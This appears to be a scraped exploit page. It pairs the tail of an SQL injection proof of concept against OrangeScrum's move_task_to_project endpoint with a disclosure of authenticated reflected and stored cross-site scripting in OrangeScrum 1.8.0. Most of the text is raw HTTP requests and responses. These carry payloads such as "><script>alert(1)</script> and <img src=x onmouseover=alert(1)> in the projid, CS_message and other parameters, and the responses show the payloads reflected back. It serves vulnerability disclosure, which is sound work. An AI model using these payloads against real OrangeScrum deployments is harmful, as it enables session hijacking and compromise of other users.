COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Content-Length: 132182 Vary: User-Agent Expires: access 12 month Connection: close [...] ----------------------------------------------------------------------------------------------------------------------- Req old_project_id=1'' - not error ----------------------------------------------------------------------------------------------------------------------- POST /orangescrum/easycases/move_task_to_project HTTP/1.1 Origin: http://127.0.0.1 Content-Length: 66 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Sec-Fetch-Site: same-origin Host: 127.0.0.1:80 Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Connection: close X-Requested-With: XMLHttpRequest Sec-Fetch-Mode: cors Cookie: language=en-gb; currency=USD; CAKEPHP=onb8uaoqhe4kst0cj5koufc781; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; IS_MODERATOR=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; LAST_CREATED_PROJ=3; TASKGROUPBY=duedate; ALL_PROJECT=all; CURRENT_FILTER=assigntome; STATUS=2 Referer: http://127.0.0.1/orangescrum/dashboard Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Sec-Fetch-Dest: empty project_id=3&old_project_id=2'';&case_id=2&case_no=1&is_multiple=0 ----------------------------------------------------------------------------------------------------------------------- Res ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sun, 28 Nov 2021 12:51:23 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Vary: User-Agent Expires: access 12 month Content-Length: 1 Connection: close Content-Type: text/html; charset=UTF-8 0
HireHackking
# Exploit Title: orangescrum 1.8.0 - 'Multiple' Cross-Site Scripting (XSS) (Authenticated) # Date: 28/11/2021 # Exploit Author: Hubert Wojciechowski # Contact Author: snup.php@gmail.com # Company: https://redteam.pl # Vendor Homepage: https://www.orangescrum.org/ # Software Link: https://www.orangescrum.org/ # Version: 1.8.0 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ### XSS Reflected # Authenticated user ----------------------------------------------------------------------------------------------------------------------- # POC ----------------------------------------------------------------------------------------------------------------------- ## Example XSS Reflected Param: projid ----------------------------------------------------------------------------------------------------------------------- Req ----------------------------------------------------------------------------------------------------------------------- POST /orangescrum/easycases/edit_reply HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: */* Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 64 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/orangescrum/dashboard Cookie: language=en-gb; currency=USD; CAKEPHP=onb8uaoqhe4kst0cj5koufc781; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; IS_MODERATOR=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; CURRENT_FILTER=cases Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin id=5&reply_flag=1&projid=1zxcvczxzxcv"><script>alert(1)</script> ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sun, 28 Nov 2021 13:28:57 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1 Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1 Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1 Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1 Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1 Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1 Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1 Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1 Content-Length: 1114 Vary: User-Agent Expires: access 12 month Connection: close Content-Type: text/html; charset=UTF-8 <table cellpadding="0" cellspacing="0" class="edit_rep_768 col-lg-12"> <tr> <td> <textarea name="edit_reply_txtbox5" id="edit_reply_txtbox5" rows="3" class="reply_txt_ipad col-lg-12"> xczcxz"/><b>bb</b>bbxczcxz"/>&ltxczcxz"/><b>bb</b>bb;b>bb</b>bbxczcxz"/><b>bb</b>bb </textarea> </td> </tr> <tr> <td align="right"> <div id="edit_btn5" class="fr"> <button type="button" value="Save" style="margin:5px;padding:3px 32px 3px 32px;" class="btn btn_blue" onclick="save_editedvalue_reply(2,5,1zxcvczxzxcv"><script>alert(1)</script>,'c64271510399996f611739b [...] ## Example XSS Stored Example vuln paraMETERS: * CS_message * name * data[User][email] ----------------------------------------------------------------------------------------------------------------------- Param: CS_message ----------------------------------------------------------------------------------------------------------------------- Req ----------------------------------------------------------------------------------------------------------------------- POST /orangescrum/easycases/ajaxpostcase HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 393 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/orangescrum/dashboard/?project=3966c2c5cc3745d161640d07450d682c Cookie: language=en-gb; currency=USD; CAKEPHP=j27a7es1lv1ln77gpngicqshe4; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; TASKGROUPBY=duedate; CURRENT_FILTER=cases; TASK_TYPE_IN_DASHBOARD=1; LAST_CREATED_PROJ=14 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin pid=14&CS_project_id=8f4adc0f496a3738f04d629be909488d&CS_istype=2&CS_title=&CS_type_id=15&CS_priority=1&CS_message=zxcvbzz"/><img%20src=x%20onmouseover=alert(1)>axcbv&CS_assign_to=1&CS_due_date=&CS_milestone=&postdata=Post&pagename=dashboard&emailUser%5B%5D=1&CS_id=2678&CS_case_no=1&datatype=1&CS_legend=2&prelegend=1&hours=0&estimated_hours=0&completed=0&taskid=0&task_uid=0&editRemovedFile= ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sun, 28 Nov 2021 13:51:29 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Vary: User-Agent Expires: access 12 month Content-Length: 698 Connection: close Content-Type: text/html; charset=UTF-8 {"success":"success","pagename":"dashboard","formdata":"8f4adc0f496a3738f04d629be909488d","postParam":"Post","caseUniqId":"eb8671bf1e20702b7793b11152e9ff32","format":2,"allfiles":null,"caseNo":"1","emailTitle":"aaaaaaaaaaaaaaz\"\/><img src=x onmouseover=alert(1)>a","emailMsg":"zxcvbzz\"\/><img src=x onmouseover=alert(1)> [...]